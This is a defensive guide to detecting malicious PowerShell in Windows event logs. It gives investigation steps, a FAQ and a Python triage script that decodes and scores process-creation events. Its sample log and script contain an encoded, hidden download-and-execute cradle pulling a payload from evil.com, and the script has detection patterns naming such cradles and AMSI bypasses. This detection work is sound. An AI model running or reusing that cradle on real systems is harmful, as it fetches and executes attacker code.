Suspicious PowerShell Execution Detection


What This Means

Detect malicious PowerShell execution in Windows event logs. Identify encoded commands, download cradles, AMSI bypasses, and living-off-the-land attack techniques.

Example Log

A new process has been created.
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGUAdgBpAGwALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA==
Creator Process: C:\Windows\System32\cmd.exe
Token Elevation Type: TokenElevationTypeFull (2)

Indicators of Suspicious Activity

How to Investigate

  1. Decode Base64-encoded commands to reveal the actual payload
  2. Identify the parent process chain (what launched PowerShell)
  3. Check if the decoded command downloads or executes remote content
  4. Review the user context (Token Elevation Type) for privilege level
  5. Search for corresponding network connections to external URLs
  6. Check Script Block Logging (Event 4104) for the full script content

Recommended Mitigations


Frequently Asked Questions

Why do attackers use PowerShell?
PowerShell is pre-installed on every Windows system, has full access to .NET and Windows APIs, can operate entirely in memory (fileless), and is trusted by most security tools. This makes it the ideal living-off-the-land tool for attackers.
How do I decode a Base64 PowerShell command?
In PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('your_base64_here')). Note that PowerShell uses Unicode (UTF-16LE) encoding, not UTF-8.
What is Script Block Logging?
Script Block Logging (Event 4104) records the full content of every PowerShell script block executed on the system, including dynamically generated and deobfuscated code. It is the single most valuable PowerShell detection control.
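The investigation steps above and the decoding answer in this FAQ both come down to the same triage routine, so here is one worked example that covers both. It is added here for illustration and is not code from this page or from the scanning service it describes. The script reads the 4688 event shown on this page, pulls the `-Enc` blob out of the command line, decodes it as Base64 over UTF-16LE (not UTF-8, as the FAQ notes), flags the hidden and non-interactive launch switches, checks the decoded text for download-and-execute indicators, records the parent process and token elevation type, and extracts any URL to pivot on for the network-connection step. It goes slightly beyond the page's single case: because powershell.exe accepts any unambiguous prefix of a switch name, the patterns match the whole prefix family (`-nop`, `-noni`, `-w`, `-e`, `-ec`), not just the forms in the sample. The second (benign) event, the list of noteworthy parent processes, the indicator patterns and the severity thresholds are constructed assumptions for the example, not rules stated on this page.

```python
import base64
import re
from typing import Optional

# Sample input: the 4688 "A new process has been created" event shown on this page.
SAMPLE_EVENT = r"""A new process has been created.
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: powershell.exe -NoP -NonI -W Hidden -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGUAdgBpAGwALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA==
Creator Process: C:\Windows\System32\cmd.exe
Token Elevation Type: TokenElevationTypeFull (2)
"""

# Constructed contrast case (not from the page): a scheduled maintenance script launched by a service.
BENIGN_EVENT = r"""A new process has been created.
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: powershell.exe -NoProfile -File C:\Scripts\Rotate-Logs.ps1
Creator Process: C:\Windows\System32\svchost.exe
Token Elevation Type: TokenElevationTypeDefault (1)
"""


def parse_event(text: str) -> dict:
    """Split a 4688-style 'Field: value' event body into a dict; lines without ': ' are ignored."""
    fields = {}
    for line in text.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    return fields


def _prefixes(word: str, min_len: int) -> str:
    """Regex alternation of every prefix of `word` at least `min_len` long, longest first."""
    return "|".join(re.escape(word[:n]) for n in range(len(word), min_len - 1, -1))


# powershell.exe accepts any unambiguous prefix of a switch (-nop, -noni, -w, -ep ...), so each
# pattern matches the prefix family rather than only the spelled-out name. (Assumed set, not the page's.)
SWITCH_PATTERNS = {
    "NoProfile": re.compile(rf"[-/](?:{_prefixes('noprofile', 3)})\b", re.I),
    "NonInteractive": re.compile(rf"[-/](?:{_prefixes('noninteractive', 4)})\b", re.I),
    "WindowStyle Hidden": re.compile(rf"[-/](?:{_prefixes('windowstyle', 1)})\s+hidden\b", re.I),
    "ExecutionPolicy Bypass": re.compile(
        rf"[-/](?:ep|{_prefixes('executionpolicy', 2)})\s+(?:bypass|unrestricted)\b", re.I),
}
# -e, -ec, -enc, -EncodedCommand ... followed by a Base64 blob; the switch is validated in code below.
ENCODED_RE = re.compile(r"[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Download-and-execute indicators checked against the decoded command (assumed set, not the page's).
INDICATOR_PATTERNS = {
    "Invoke-Expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "Download cradle": re.compile(
        r"net\.webclient|download(?:string|file|data)|invoke-webrequest|\biwr\b|"
        r"invoke-restmethod|\birm\b|start-bitstransfer", re.I),
    "Remote URL": re.compile(r"https?://[^\s'\")]+", re.I),
    "AMSI reference": re.compile(r"\bamsi", re.I),
}
URL_RE = INDICATOR_PATTERNS["Remote URL"]

# Parents that rarely launch PowerShell in normal use (assumed list for the example).
NOTEWORTHY_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
                      "regsvr32.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Meaning of the number in 'Token Elevation Type: TokenElevationTypeX (n)'.
ELEVATION_TYPES = {
    "1": "Default (no split token: SYSTEM, built-in Administrator, or UAC disabled)",
    "2": "Full (elevated administrator token)",
    "3": "Limited (standard-user token)",
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the Base64 blob passed to -EncodedCommand (any prefix, or -ec), else None."""
    for m in ENCODED_RE.finditer(cmdline):
        switch = m.group(1).lower()
        if switch == "ec" or "encodedcommand".startswith(switch):
            return m.group(2)
    return None


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode -EncodedCommand input: Base64 over UTF-16LE text, not UTF-8. None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error (bad Base64) and UnicodeDecodeError (odd/garbled bytes)
        return None


def elevation_label(value: str) -> str:
    """Map 'TokenElevationTypeFull (2)' to what the number means for the privilege level."""
    m = re.search(r"\((\d)\)", value)
    return ELEVATION_TYPES.get(m.group(1), value) if m else value


def analyze_event(text: str) -> dict:
    """Triage one process-creation event along the investigation steps on the page."""
    fields = parse_event(text)
    cmdline = fields.get("Process Command Line", "")
    parent = fields.get("Creator Process", "")

    # Step 1: decode -Enc so the real payload, not the Base64, is what gets inspected.
    blob = extract_encoded_command(cmdline)
    decoded = decode_encoded_command(blob) if blob else None
    effective = decoded if decoded is not None else cmdline

    switches = [name for name, rx in SWITCH_PATTERNS.items() if rx.search(cmdline)]
    if blob:
        switches.append("EncodedCommand")
    # Step 3: download / execute behaviour in the decoded content; step 5: URLs to pivot on.
    indicators = [name for name, rx in INDICATOR_PATTERNS.items() if rx.search(effective)]
    urls = URL_RE.findall(effective)

    score = len(switches) + 2 * len(indicators)  # assumed weighting for the example
    return {
        "process": fields.get("Process Name", ""),
        "parent": parent,  # step 2: what launched PowerShell
        "parent_noteworthy": parent.lower().rsplit("\\", 1)[-1] in NOTEWORTHY_PARENTS,
        "elevation": elevation_label(fields.get("Token Elevation Type", "")),  # step 4
        "switches": switches,
        "encoded_command": blob,
        "decoded_command": decoded,
        "indicators": indicators,
        "urls": urls,
        "severity": "high" if score >= 5 else "medium" if score >= 2 else "low",
    }


if __name__ == "__main__":
    for label, event in (("page sample", SAMPLE_EVENT), ("constructed benign", BENIGN_EVENT)):
        r = analyze_event(event)
        print(f"[{label}] severity={r['severity']} switches={r['switches']}")
        print(f"  parent={r['parent']} noteworthy={r['parent_noteworthy']} elevation={r['elevation']}")
        print(f"  decoded={r['decoded_command']!r}")
        print(f"  indicators={r['indicators']} urls={r['urls']}")
```

Run it as-is to see the page's sample decode to the `IEX(New-Object Net.WebClient).DownloadString(...)` cradle and score high, while the constructed `-File` launch from svchost.exe scores low. The decoded text is what should be matched against Script Block Logging (Event 4104), since that is where obfuscation layers beyond the first Base64 wrapper are unwound; the extracted URL is the pivot into proxy or DNS telemetry.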